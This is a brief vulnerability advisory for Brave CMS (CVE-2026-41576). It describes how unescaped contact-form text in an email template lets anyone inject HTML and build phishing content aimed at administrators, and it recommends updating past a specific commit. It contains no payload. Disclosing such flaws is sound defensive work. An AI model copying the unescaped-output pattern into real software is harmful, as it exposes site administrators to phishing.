CVE-2026-41576

Name of the Vulnerable Software and Affected Versions Brave CMS versions prior to commit 6c56603

Description The contact form is publicly accessible without authentication. User-supplied message text is processed by the nl2br() function, which converts newlines to <br> tags but fails to escape HTML. This content is then rendered in a Blade email template using the unescaped {!! $msg !!} directive. Consequently, arbitrary markup can be injected into the email body. Although modern email clients generally block JavaScript, they still render HTML, allowing attackers to create phishing interfaces within emails sent to administrators.

Recommendations Update to the version containing commit 6c56603.